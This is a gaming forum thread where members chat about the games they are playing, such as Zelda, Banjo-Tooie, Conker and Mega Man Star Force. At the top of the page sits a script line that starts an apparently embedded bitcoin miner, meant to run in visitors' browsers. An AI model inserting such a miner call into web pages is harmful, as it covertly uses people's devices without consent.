<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitysmw centralpge project

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
KobaBeach
arc the lad
First name: David
Pronouns: he/they

Re: What games are you playing?

Postby KobaBeach » 4 years ago

Got the first two crystals in LttP

Also the Magic Robe, the Flute, the Bombos Medallion, the Mad Batter's half-magic use upgrade, all of the Pond of Happiness upgrades, and a bunch of Heart Pieces

Am I the only one who thinks the Helmasaur King looks kinda like the Full Metal Hugger from Seiken Densetsu 3
twitter (spicy at times!) | avatar by kuma

who cares:

Kuupa
That's me on the beat, btw [:
First name: Alex
Pronouns: the male ones

Postby Kuupa » 4 years ago

I finally caved and got myself a Wii U, and I am very happily enjoying 3D World and Sm4sh c:
So here we are. Plays have been enacted. Empires have come and gone. The mightiest have passed away and withered, alike the least. Fires have burned, thousandfold. Yet, did not the great wind serenely continue its course? Does not the blackbird still sing its song? Does not the mistletoe still dwell in the oak's crown? Forgotten, what once has been told. Veiled, the words that once so rang out. Shrouded, like the larva in its cocoon. Let him hear it, who will.

Bean

Postby Bean » 4 years ago

Wii U has enough first-party games with indies to warrant it at this point. I'm so far behind on it at the moment. TW101, Captain Toad, Kirby, and now Splatoon... Haven't played a single one of them yet. Oops.

What I have played was Super Mario Kart and Mega Man Powered Up for recording purposes. Still have a lot to go in the latter, but the former needs me to open Camtasia and get the party started already.

Alice
?
Pronouns: Girl person

Postby Alice » 4 years ago

Bean wrote:What I have played was Super Mario Kart and Mega Man Powered Up for recording purposes. Still have a lot to go in the latter, but the former needs me to open Camtasia and get the party started already.
MMPU is on the WiiU?

ohmato
hey idiot

Postby ohmato » 4 years ago

Kuupa wrote: enjoying 3D World
Don't play it with friends, if you still want friends

Ashan
The world has become a place

Postby Ashan » 4 years ago

Alice wrote:
Bean wrote:What I have played was Super Mario Kart and Mega Man Powered Up for recording purposes. Still have a lot to go in the latter, but the former needs me to open Camtasia and get the party started already.
MMPU is on the WiiU?
The games he was playing was a separate thought from the previous paragraph where he was listing Wii U games he hasn't played yet.

Window Squeegee
Hog with a Blog
Pronouns: he/him/his

Postby Window Squeegee » 4 years ago

Onto Grunty Industries in Banjo-Tooie.

UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHH

ohmato
hey idiot

SO PHOENIX WRIGHT IS PRETTY GOOD

Bean

Ashan wrote:The games he was playing was a separate thought from the previous paragraph where he was listing Wii U games he hasn't played yet.
Mm-hmm. That's right. Probably getting ready to add Dragon Quest VI (DS) to the mix now that the first Super Mario Kart's done with already.

KobaBeach
arc the lad

I'm at the Ice Palace blaaaahhhh
Bean wrote:Probably getting ready to add Dragon Quest VI (DS) to the mix now that the first Super Mario Kart's done with already.
gluck!!!

who cares:

Picochilla
The eternal Cuddles

Postby Picochilla » 4 years ago

http://tane.us/nintendo/

You probaly love that :>
100% Approved!
Patooties are Talkhaus' best thing!
So... I just put in my Youtube-Channel

Jesuiscontent
Tsundere
First name: cool old field

Postby Jesuiscontent » 4 years ago

The Legend of Zelda: Stale Mascara Image

Euparkeria
Palaeontological Platformerer

Postby Euparkeria » 4 years ago

Hopefully K. Rool will attend Donkey Kong Country Meeting.
Cool banner by Neutron Star!

KobaBeach
arc the lad

Star Fox Gladiolus
if i wasn't lazy i'd post one of togepi1125's commissions but with fox and falco (and wolf)'s heads replaced with gladiolus' from ffxv

who cares:

ohmato
hey idiot

The Legend of Zelda: Involved Bacon

Ashan

Bit over an hour into Mega Man Star Force 3 and WOW this takes its time at getting started.
I've been running around the school helping this girl getting her approval rating up so she can become student body president. Doesn't that sound fun?!?!?!?!

Window Squeegee
Hog with a Blog

Onto Cauldron Keep in Banjo Tooie, the home stretch now.

QUIZ TIME!

KobaBeach
arc the lad

Window Squeegee wrote:Onto Cauldron Keep in Banjo Tooie, the home stretch now.

QUIZ TIME!
you can do it baby

who cares:

Window Squeegee
Hog with a Blog

KobaBeach wrote:
Window Squeegee wrote:Onto Cauldron Keep in Banjo Tooie, the home stretch now.

QUIZ TIME!
you can do it baby
Just did :roll: Now all I have left to beat when it comes to the Rare 3D platformers is the matur-est one. I have owned this for an incredibly long time but I never even played it. I know some things about it, specifically certain bosses being a giant poo and a

xenomorph

, but its mostly blind. I hope the internet's desensitization pays off! Also, I'm definitely beating Yooka Laylee when it comes out. P.S.: Screw Canary Mary. I have never been more frustrated in mashing a button in my life

KobaBeach
arc the lad

Window Squeegee wrote:Just did :roll: Now all I have left to beat when it comes to the Rare 3D platformers is the matur-est one. I have owned this for an incredibly long time but I never even played it. I know some things about it, specifically certain bosses being a giant poo and a

xenomorph

, but its mostly blind. I hope the internet's desensitization pays off! Also, I'm definitely beating Yooka Laylee when it comes out. P.S.: Screw Canary Mary. I have never been more frustrated in mashing a button in my life
i knew about great mighty poo but not the

xenomorph

huh

also don't worry, from what i've seen conker is mostly just toilet humor, lewd jokes and the occasional comedic gore

headshot some tediz for me will ya
good luck aramaki scaltinof

you may not have him in your av anymore but i will always keep picturing you as him
your miisona having his facial expression doesn't really help

who cares:

Bean

Instead of starting Dragon Quest VI, I wound up going back to the 3DS for this Puzzles & Dragons game. Playing through the SMB version is okay, but it really seems like the game just wants you to use a certain enemy to boost your levels early, and you'll need to since most stages are a series of 5-10 battles where one mistake costs you a continue. Castle bosses can be a nightmare if you can't get the setup you want. Still, it's something different, so I'm giving it a chance. It's all right so far as I'm in the middle of World 5 now after a few days of playing.

Window Squeegee
Hog with a Blog

Just got past the part with the zombies in the mansion in Conker. It was REAL spooky, especially compared to the South Park-ish feel of the rest of the game. It also didn't help that my aim is garbage either, even with the laser scope. However, the fear went away real quickly after I started playing Guile's Theme.

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 4 years ago

Began playing through the history so far of obscure indie dev Rail Slave, in order of release. //N.P.P.D.RUSH// - The milk of Ultra violet was pretty cool, but Uriel's Chasm was outright amazing. Which is saying something, considering it's the lowest-rated game on Steam, for some reason. It's... it's great, honestly. Both of these games are quite short (if you're skilled, anyway) so if you want to play them, maybe get them on sale for super cheap, which you can do right now!

Tomorrow I play //SNOWFLAKE TATTOO// and Selfie: Sisters of the Amniotic Lens, and that will be that until he finishes his next game which he recently started on. I really like this guy.
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Ashan

As I play through more of Mega Man Star Force 3, I can't help but notice something that didn't bother me back when I was playing the games as they came out, but it's glaring now:
it's hilarious how they managed to basically reboot the Battle Network series without rebooting it at all.

So much of it feels like a weird knockoff than a truly "new" series. It's like they started off making the games by going through a Battle Network game with find & replace in Microsoft Word to switch out every instance of "internet" with "EM waves" and whatnot. And the characters are such blatant edits of the BN characters:
  • Geo/Lan is the protagonist; a 5th/6th grade kid with spiky, brown hair
  • Omega-Xis/Mega Man is a blue being made out of internet/radio waves that lives in the protagonist's gadget they carry around
  • Geo's mom/Lan's mom is a woman who lives in the kitchen I guess. She's there like 100% of the time and sometimes says mom things
  • Bud/Dex is the protagonist's tall, fat friend that's generally a slob and likes to eat
  • Zack/Yai is the protagonist's short, nerd friend that puts more time into their schoolwork than anything else
  • Sonia/Mayl is the protagonist's cute, musically gifted friend/love interest with unnaturally coloured hair
  • Luna is kind of a mix of Mayl/Yai. I guess that's kinda different.
  • Rogue/Chaud is the mysterious badass with white hair that makes appearances every once in a while
It also seemed to get worse as the series went on. At the beginning it seemed to differentiate itself more, but I think they realized that the amount of game mechanics they kept over while changing how they're use for the sake of lore didn't make much sense in the new system, so they made it more like the Battle Network games so it makes sense again.
For instance, cattle cards had basically no reason to exist before the 3rd game. It makes sense for Mega Man with the way we use them, basically the same as battle chips were used in the BN series, but he was one of a few people in the world that could take advantage of them in that way, since humans merging with aliens wasn't a normal thing. In Battle Network, chips made sense to exist: pretty much everyone had a net navi to take advantage of them, and you were just one of many people who used them in that way you did in the game. Some people used chips for their net navis to protect themselves from viruses on the internet, some people just liked to battle net navis recreationally, etc. But in Star Force, they had this vague excuse that like... sometimes the radio waves would act up so people would use battle cards to delete EM viruses or something? Like, I guess they just stood there, shoving cards into their gizmo until the virus deleted? I'm not sure if the anime ever explained how it worked, but it really doesn't make near as much sense as it does with battle chips in the BN games.
And I think Capcom realized this, cause by the third game, they backtracked all the way to a bunch of people having "wizards" in their gadgets, basically the same as people having navis in BN, albeit these people can't merge with their wizards like we can. But at least with wizards existing, we have a bit more of a reason for how other people can use battle cards: wizards take advantage of them. But really, what were people using a "sword" or "invis" battle card for before the third game?

With all this said, I don't want to give off the impression that I think the Star Force series is bad, it's just very noticeable how unoriginal it was.

Picochilla
The eternal Cuddles

Postby Picochilla » 4 years ago

Played some Squirreltopia today...

Would be half as hard when Mr. Space Bar would cooperate.
100% Approved!
Patooties are Talkhaus' best thing!
So... I just put in my Youtube-Channel

Return to “the cartridgé”